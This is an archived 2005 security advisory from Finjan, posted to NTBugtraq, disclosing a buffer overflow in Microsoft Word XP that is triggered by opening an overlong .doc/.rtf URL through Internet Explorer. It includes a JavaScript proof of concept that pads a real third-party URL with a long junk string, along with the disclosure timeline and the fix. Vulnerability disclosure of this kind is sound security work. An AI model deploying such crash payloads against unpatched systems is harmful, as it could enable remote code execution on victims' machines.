|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Finjan Security Advisory: Microsoft Office XP Remote Buffer Overflow Vulnerability
From: Rafel Ivgi (rivgi
FINJAN.COM)
Date: Tue Feb 08 2005 - 18:18:45 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Finjan Security Advisory
Microsoft Office XP Remote Buffer Overflow Vulnerability
Introduction
Finjan has discovered a new vulnerability in Microsoft Word
XP that would allow a hacker to launch a buffer overflow attack.
This attack could occur when a user opened a Word document using
Internet Explorer.
Technical Description
When a ".doc" file is opened inside Internet Explorer, Microsoft
Word XP "takes over" and opens that doc file. The problem appears
when sending a doc file request that contains a null byte (parser)
at the end of the doc filename (the rtf extension is also vulnerable).
For example:
http://www.myhost.com/myfile.doc is a valid request.
However This:
http://www.myhost.com/myfile.doc%00aaaaaaaaaaaaaaaaaaaaaaa...aa.doc
is an invalid request. Such a request will be sent to the server
hosting the doc file.
Most servers like IIS and Apache will truncate the characters before
the %00 while sending the filename to Internet Explorer.
At this stage, Internet Explorer will hand over the string to Microsoft
Word XP, which will now receive a long string. This string causes an
exploitable buffer overflow, allowing remote code execution.
The Code (Proof of Concept)
<Script>
var mylongstring,myjunk;
mylongstring ="";
myjunk="bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
bbbbbbbbbbbbbbbbbbb";
for(c=1;c<5000;c++)
{
mylongstring = mylongstring + myjunk;
}
window.open("http://www.hhs.gov/ocr/privacysummary.rtf%0a"+mylongstring);
</script>
Vulnerability Status
Microsoft was notified on July 13, 2004.
The bug is now fixed. For further details please refer to Microsoft
security bulletin MS05-004.
Credit
Rafel Ivgi, Malicious Code Research Center (MCRC), Finjan Software Ltd.
-----------------------------------------------
This message was scanned for malicious content and viruses by Finjan Internet Vital Security 1Box(tm)
--
NTBugtraq Editor's Note:
Most viruses these days use spoofed email addresses. As such, using an Anti-Virus product which automatically notifies the perceived sender of a message it believes is infected may well cause more harm than good. Someone who did not actually send you a virus may receive the notification and scramble their support staff to find an infection which never existed in the first place. Suggest such notifications be disabled by whomever is responsible for your AV, or at least that the idea is considered.
--
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]